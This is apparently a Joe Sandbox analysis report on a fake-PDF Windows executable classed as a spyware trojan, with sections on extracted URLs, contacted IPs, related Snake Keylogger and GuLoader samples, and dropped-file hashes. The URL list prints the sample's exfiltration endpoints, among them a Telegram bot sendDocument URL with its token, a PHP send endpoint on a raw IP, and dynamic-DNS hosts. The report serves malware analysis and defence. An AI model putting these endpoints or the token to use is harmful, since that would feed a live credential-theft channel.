https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2144153415.0000000004881000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004BDD000.00000004.00000020.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E27000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E54000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021C83000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F2A000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CB0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D8C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2144153415.0000000004881000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/w	Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C20000.00000004.00000020.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C1D000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DC2000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DB3000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://translate.google.com/translate_a/element.js	Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C20000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF6000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E4C000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CA8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021D1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	678763_PDF.exe, Beskftigelsesmssiges.exe.1.dr	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?L	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.micro	powershell.exe, 00000001.00000002.2149944779.0000000006F73000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2143382911.0000000000739000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C8C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E27000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E54000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021C83000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F2A000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CB0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.181.129	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.217.19.174	drive.google.com	United States	15169	GOOGLEUS	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1566735
Start date and time:	2024-12-02 16:13:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	678763_PDF.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/13@5/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 130 Number of non-executed functions: 81
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7308 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 678763_PDF.exe

Simulations

Behavior and APIs

Time	Type	Description
10:13:59	API Interceptor	35x Sleep call for process: powershell.exe modified
10:15:10	API Interceptor	11303x Sleep call for process: Beskftigelsesmssiges.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Gastroptosis (5).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	FATURA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	JIL-_Document_No._2500015903.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	z705688y7t7tgggju97867756576.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Viderefrt.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PACKING_LIST_DOCUMENT_BQG9390309727.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
149.154.167.220	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://fn-fi.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	New Order C0038 2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	021337ISOGENERAL.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://fn-fi.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	New Order C0038 2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	021337ISOGENERAL.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
checkip.dyndns.com	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	QUOTATION_DECQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	swift.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Gastroptosis (5).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
reallyfreegeoip.org	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	QUOTATION_DECQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	swift.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	Gastroptosis (5).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://fn-fi.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	New Order C0038 2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	021337ISOGENERAL.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
UTMEMUS	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Gastroptosis (5).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	021337ISOGENERAL.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PO80330293.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	RYSUNEK_.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	132.226.26.69
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	132.226.187.188
CLOUDFLARENETUS	Swiftcopy.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.9
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.16.9
	Swiftcopy.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.194.230
	Swiftcopy.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.6
	https://mlkp.mailinghub.net/?r=aHR0cHM6Ly93ZXRodW50LmNvbS9wcm9maWxlL25vdGlmaWNhdGlvbnM%2FYWs9MTczMDY1MjM1NVdjY3pCYjVSOGImcGU9MzY2MTgmc3ViX2lkPTQxNjMwNzUzNTgmcD0xODE5NSZkZWxpdmVyX2lkPTc0OTIzNDYxNjQxNzkyNzk4MSZpc19uZXdfc3ViPTEmdnM9Mg%3D%3D&did=749234616417927981	Get hash	malicious	Unknown	Browse	172.67.73.31
	New Order.xls	Get hash	malicious	Unknown	Browse	188.114.96.6
	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	http://trendisall.com	Get hash	malicious	Unknown	Browse	172.67.211.129
	QUOTATION_DECQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	111101155134.vbs	Get hash	malicious	FormBook	Browse	172.67.147.247

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	QUOTATION_DECQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	swift.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Gastroptosis (5).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs	Get hash	malicious	GuLoader, Remcos	Browse	149.154.167.220
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	l6F8Xgr0Ov.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SPlVyHiGOz.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	149.154.167.220
	55qIbHIAZi.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	149.154.167.220
	tEEa6j67ss.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.220
	Quotation.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	149.154.167.220
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs	Get hash	malicious	GuLoader, Remcos	Browse	142.250.181.129 172.217.19.174
	Quote Qu11262024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	142.250.181.129 172.217.19.174
	Factura 9000012567.exe	Get hash	malicious	GuLoader	Browse	142.250.181.129 172.217.19.174
	Comprobante de pago.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.181.129 172.217.19.174
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.181.129 172.217.19.174
	Factura 9000012567.exe	Get hash	malicious	GuLoader	Browse	142.250.181.129 172.217.19.174
	Gastroptosis (5).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.181.129 172.217.19.174
	SPP_14667098030794_8611971920#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	142.250.181.129 172.217.19.174
	021337ISOGENERAL.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	142.250.181.129 172.217.19.174
	6ufJvua5w2.exe	Get hash	malicious	CryptOne, Stealc, Vidar	Browse	142.250.181.129 172.217.19.174

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Shipping documents 000022999878999800009999.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Ze1Ueabtx5.img	Get hash	malicious	AgentTesla, GuLoader	Browse
	Documenti di spedizione 0009333000459595995.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	4hIPvzV6a2.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe	Get hash	malicious	Unknown	Browse
	3Dut8dFCwD.exe	Get hash	malicious	Unknown	Browse
	Ms63nDrOBa.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	711659
Entropy (8bit):	7.810658317463929
Encrypted:	false
SSDEEP:	12288:IfL/UfibuJ2zMMzztVZK+u5YBCtKlQyYefZKSxA340ryKhzJ:IfL8fibuJ2/JVZZuaBCtjexKj3vR
MD5:	42B3EEFF606C41053B2B30E6DF1BAA87
SHA1:	8957AC95D71567CCF7D0EFC28DDCC944352308D0
SHA-256:	F3B82A629B1EFF8B49EDCFB38F2D0CBD0EF366A59A97264EB7B86373A45588C4
SHA-512:	2646E4CD32E39C285BE65EECAB4BC6C6E92A1B5E5992BA53B5D4F062DDCDE1B1A596773D2976442BE6ED3BE5D36144F4CF23CAF665B248909AA1AEE316B453B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................@...k...........................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....k...@...l..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe:Zone.Identifier

Download File

